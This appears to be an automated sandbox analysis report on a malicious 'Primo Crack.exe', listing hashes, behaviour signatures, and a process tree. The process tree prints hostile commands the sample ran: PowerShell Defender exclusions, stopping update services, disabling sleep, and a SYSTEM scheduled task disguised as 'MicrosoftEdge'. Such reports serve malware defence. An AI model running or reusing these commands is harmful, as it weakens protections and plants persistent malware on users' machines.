Analysis
-
max time kernel
28s -
max time network
21s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2024, 19:24
Static task
static1
Behavioral task
behavioral1
Sample
Primo Crack.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Primo Crack.exe
Resource
win10v2004-20240226-en
General
-
Target
Primo Crack.exe
-
Size
21.8MB
-
MD5
7bd9a2fb4321091b1dfbf6c0745647e4
-
SHA1
11c4f761d6830aa197a09dd79c3d44c6c039a990
-
SHA256
e9ab710bfd539b727c6059d390489350049f6b2a9967c0d878cb45147a11d1d2
-
SHA512
aa9064f488c50bb96a23663890bbf8e8304209056f79a83c0adb754f50b5343cd0572e894e3bc30676513d38fd2d5b6787101efaba051780c0407fd48590dac5
-
SSDEEP
393216:C33wl7xujbrQm+qSYtN0Pl2HBcif5fbovAHUSpTk0JhtlwN0/Cy7XZ4sI+WyZC8:QkxujbrQm+m0t2aglo4J9w+LZ4sI+jC8
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 1820 created 3472 1820 updater.exe 57 PID 1820 created 3472 1820 updater.exe 57 PID 1820 created 3472 1820 updater.exe 57 PID 1820 created 3472 1820 updater.exe 57 PID 1820 created 3472 1820 updater.exe 57 -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation Primo Crack.exe -
Executes dropped EXE 2 IoCs
pid Process 4436 cli_gui.exe 1820 updater.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3200 Primo Crack.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1820 set thread context of 1132 1820 updater.exe 110 -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1228 sc.exe 4704 sc.exe 1640 sc.exe 3740 sc.exe 4932 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 3200 Primo Crack.exe 3200 Primo Crack.exe 1820 updater.exe 1820 updater.exe 5064 powershell.exe 5064 powershell.exe 5064 powershell.exe 1820 updater.exe 1820 updater.exe 1820 updater.exe 1820 updater.exe 1820 updater.exe 1820 updater.exe 1820 updater.exe 1820 updater.exe 1132 dialer.exe 1132 dialer.exe 4676 powershell.exe 4676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 5064 powershell.exe Token: SeDebugPrivilege 1132 dialer.exe Token: SeShutdownPrivilege 3340 powercfg.exe Token: SeCreatePagefilePrivilege 3340 powercfg.exe Token: SeDebugPrivilege 4676 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3200 Primo Crack.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 3200 wrote to memory of 4436 3200 Primo Crack.exe 89 PID 3200 wrote to memory of 4436 3200 Primo Crack.exe 89 PID 3200 wrote to memory of 1820 3200 Primo Crack.exe 91 PID 3200 wrote to memory of 1820 3200 Primo Crack.exe 91 PID 396 wrote to memory of 1228 396 cmd.exe 103 PID 396 wrote to memory of 1228 396 cmd.exe 103 PID 396 wrote to memory of 4704 396 cmd.exe 104 PID 396 wrote to memory of 4704 396 cmd.exe 104 PID 396 wrote to memory of 1640 396 cmd.exe 105 PID 396 wrote to memory of 1640 396 cmd.exe 105 PID 396 wrote to memory of 3740 396 cmd.exe 106 PID 396 wrote to memory of 3740 396 cmd.exe 106 PID 396 wrote to memory of 4932 396 cmd.exe 107 PID 396 wrote to memory of 4932 396 cmd.exe 107 PID 1820 wrote to memory of 1132 1820 updater.exe 110 PID 3432 wrote to memory of 3340 3432 cmd.exe 113 PID 3432 wrote to memory of 3340 3432 cmd.exe 113 PID 3432 wrote to memory of 4880 3432 cmd.exe 114 PID 3432 wrote to memory of 4880 3432 cmd.exe 114
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3472
-
C:\Users\Admin\AppData\Local\Temp\Primo Crack.exe"C:\Users\Admin\AppData\Local\Temp\Primo Crack.exe"2⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"C:\Users\Admin\AppData\Local\Temp\cli_gui.exe"3⤵
- Executes dropped EXE
PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\updater.exe"C:\Users\Admin\AppData\Local\Temp\updater.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1820
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1228
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4704
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1640
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3740
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4932
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4880
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:3352
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3312
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lfvbfbo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'MicrosoftEdge' /tr '''C:\Program Files\Microsoft\Edge\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Microsoft\Edge\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'MicrosoftEdge' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
19KB
MD5200b0db263eb5e5f206f675e68754752
SHA1321e12424e920d1858d649733e091cddf4596490
SHA2569a09528f04665f407b871562d26df3f1bf58a0d36e4311e749193fbdc40e4b9b
SHA512ba78532edae85759201a7e6fa71012a1c64c90cce44c90ce3663ea41196ab611d31cf0a89d52cfb74dfbdb392911411466a7d24738674a4ad50b56f70bde3b4f
-
Filesize
5.7MB
MD58cd62e3ece85c4c3e9f6f7c816256adf
SHA19712769be3f755c5ecbe68d38800a3a8ecdaf324
SHA25639ebcdbb6993787be2ed9d2b6668b9ee2707ca483a66b51d1302bfc610ba021b
SHA512a0aa9f0e6542c526fc18d48ab945d8be3245900381c9640f6e122a633a15dd9a9364bacd830fbc588a926ebef8240300c1fbf4211eae600cff8b7e2c63613501